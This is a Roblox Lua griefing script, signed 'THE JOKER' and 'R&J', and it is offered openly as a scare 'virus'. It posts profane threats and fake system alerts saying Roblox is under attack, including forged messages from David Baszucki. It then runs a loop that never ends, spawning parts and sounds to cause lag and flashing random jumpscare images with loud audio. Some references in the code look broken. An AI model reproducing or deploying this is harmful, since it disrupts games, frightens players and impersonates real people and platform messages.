--AntiFly = THE R&J CORE!! (WARNING! , IN THE LINES 243-346 IS AN SCARY IMAGES AND SOUNDS!)


local foldername = "JOKER"
local p = script.Parent.Parent.PlayerGui
--Warning texts (edit if you want)



bc = BrickColor.new("Really red") --Color
bc2 = BrickColor.new("Really red")  --Color

game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "THE JOKER & AUX PLANS"; --Text1. Put what you want to say in here
	Font = Enum.Font.Cartoon; --Change "Cartoon" To Any Font You Want That Works In Roblox
	Color = bc.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(2)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "PRESENTS"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc2.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(2)	


local h = Instance.new("Message")
h.Parent = p
h.Text = "WARNING!!"
wait(5)
h:Remove()

local g = Instance.new("Message")
g.Parent = p
g.Text = "R&J WAS HERE!!"
wait(5)
g:Remove()

local i = Instance.new("Message")
i.Parent = p
i.Text = "''''RoJack''''"
wait(5)
i:Remove()

local j = Instance.new("Message")
j.Parent = p
j.Text = "GET OUT RIGHT NOW OR ELSE THE JOKER & AUX PLANS WILL HACK YOU AND FUCK YOU!!!!"
wait(5)
j:Remove()


local k = Instance.new("Message")
k.Parent = p
k.Text = "3!!!!!"
wait(1)
k:Remove()

local k = Instance.new("Message")
k.Parent = p
k.Text = "2!!!!!"
wait(1)
k:Remove()

local k = Instance.new("Message")
k.Parent = p
k.Text = "1!!!!!"
wait(1)
k:Remove()

--an folder creator (not works but adds more weight to te script to an little more lag , and help me)
local bc3 = BrickColor.new("Medium orange")
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[System]: Warning ,"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(4)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[System]: Roblox is being Attacked by"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(5)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[System]: An virus called R&J"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(3)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[System]: But Roblox's major vulnerability has been patched"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(2)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[System]: Oh , I lost say  "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(4)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[S̶y̶s̶t̶e̶m̶  R&J]: NOT ENJOY ROBLOX >:) "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc3.Color;
	FontSize = Enum.FontSize.Size96;
})

wait(2)
function newFolder()
	local Folder = Instance.new("Folder",workspace)
	Folder.Name = foldername
end

-- False "David Baszucki" Messages

local bc4 = BrickColor.new("Really red")

game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[David Baszucki]: RED ALERT , PLEASE COME TO THE ROBLOX CAMPUS "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(3)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[David Baszucki]: IS VERY SERIOUS THIS PROBLEM!!!!!!! "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(2)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "[David Baszucki (My Puppet >:)]: PLEASE!!!!!!! "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
wait(5)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "   "; --12  18
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "   "; --12  18
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "██████╗░   "; --12  18
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "██╔══██╗  "; --Text2. Put what
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "██████╔╝ "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "██╔══██╗ "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "██║░░██║"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = ""; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "     ░░░░░██╗	"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "       ░░░░░██║ "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "       ░░░░░██║ "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "       ██╗░░██║"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "       ╚█████╔╝ "; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})
game.StarterGui:SetCore("ChatMakeSystemMessage", {
	Text = "        ░╚════╝░     -With love, ELJOKER"; --Text2. Put what you want to say in here
	Font = Enum.Font.Cartoon;
	Color = bc4.Color;
	FontSize = Enum.FontSize.Size96;
})

--the parts creator (VERY IMPORTANT)

repeat
	
	Instance.new("Part", game.Workspace)
	Instance.new("Part", game.Workspace)
	wait(0.1)
	
	local w = Instance.new("Hint", p)
	w.Text = math.random(1,90000)
	
	Instance.new("Sound", p.ScreenGui)
	
	local jd = math.random(1,200)
	local v = p.ScreenGui.Sound.Volume
	wait()
	if jd == 10 then
		-- JOKER
		Instance.new("ScreenGui", p)
		Instance.new("ImageLabel", p.ScreenGui)
		Instance.new("Sound", p.ScreenGui)
		p.ScreenGui.ImageLabel.Image = "rbxassetid://12698170603"
		p.ScreenGui.ImageLabel.Size = UDim2.new(0, 971, 0, 627)
		p.ScreenGui.Sound.SoundId = "rbxassetid://138085144"
		v = "100"
		p.ScreenGui.Sound:Play()
		p.ScreenGui.Sound.Ended:Wait()
		p.ScreenGui.Sound:Remove()
		p.ScreenGui.ImageLabel:Remove()
		p.ScreenGui:Remove()
	end

	if jd == 15 then
		-- NOOB FACE WITCH BLOOD AND SCARY
		Instance.new("ScreenGui", p)
		Instance.new("ImageLabel", p.ScreenGui)
		Instance.new("Sound", p.ScreenGui)
		
		p.ScreenGui.ImageLabel.Image = "rbxassetid://4749623118"
		
		p.ScreenGui.ImageLabel.Size = UDim2.new(0, 971, 0, 627)
		
		p.ScreenGui.Sound.SoundId = "rbxassetid://7854285068"
		
		v = "100"
		
		p.ScreenGui.Sound:Play()
		p.ScreenGui.Sound.Ended:Wait()
		p.ScreenGui.Sound:Remove()
		p.ScreenGui.ImageLabel:Remove()
		p.ScreenGui:Remove()
	end 
	
	if jd == 86 then
		-- EXE (Incluides laugh)
		Instance.new("ScreenGui", p)
		Instance.new("ImageLabel", p.ScreenGui)
		Instance.new("Sound", p.ScreenGui)
		
		p.ScreenGui.ImageLabel.Image = "rbxassetid://1736422966"
		
		p.ScreenGui.ImageLabel.Size = UDim2.new(0, 971, 0, 627)
		
		p.ScreenGui.Sound.SoundId = "rbxassetid://7337298420"
		
		v = "100"
		
		p.ScreenGui.Sound:Play()
		p.ScreenGui.Sound.Ended:Wait()
		p.ScreenGui.Sound:Remove()
		p.ScreenGui.ImageLabel:Remove()
		p.ScreenGui:Remove()
	end 
	
	if jd == 162 then
		-- EYE
		Instance.new("ScreenGui", p)
		Instance.new("ImageLabel", p.ScreenGui)
		Instance.new("Sound", p.ScreenGui)
		
		p.ScreenGui.ImageLabel.Image = "rbxassetid://10657365540"
		
		p.ScreenGui.ImageLabel.Size = UDim2.new(0, 971, 0, 627)
		
		p.ScreenGui.Sound.SoundId = "rbxassetid://157636218"
		
		v = "100"
		
		p.ScreenGui.Sound:Play()
		p.ScreenGui.Sound.Ended:Wait()
		p.ScreenGui.Sound:Remove()
		p.ScreenGui.ImageLabel:Remove()
		p.ScreenGui:Remove()
	end 
	
	if jd == 145 then
		-- An scary face
		Instance.new("ScreenGui", p)
		Instance.new("ImageLabel", p.ScreenGui)
		Instance.new("Sound", p.ScreenGui)
		
		p.ScreenGui.ImageLabel.Image = "rbxassetid://7057923071"
		
		p.ScreenGui.ImageLabel.Size = UDim2.new(0, 971, 0, 627)
		
		p.ScreenGui.Sound.SoundId = "rbxassetid://157636218"
		
		v = "100"
		
		p.ScreenGui.Sound:Play()
		p.ScreenGui.Sound.Ended:Wait()
		p.ScreenGui.Sound:Remove()
		p.ScreenGui.ImageLabel:Remove()
		p.ScreenGui:Remove()
	end 
	
	wait()
	
	print ("HEHE")
until

print("HELLO")





--an message (console)

print("BY-THE-JOKER")
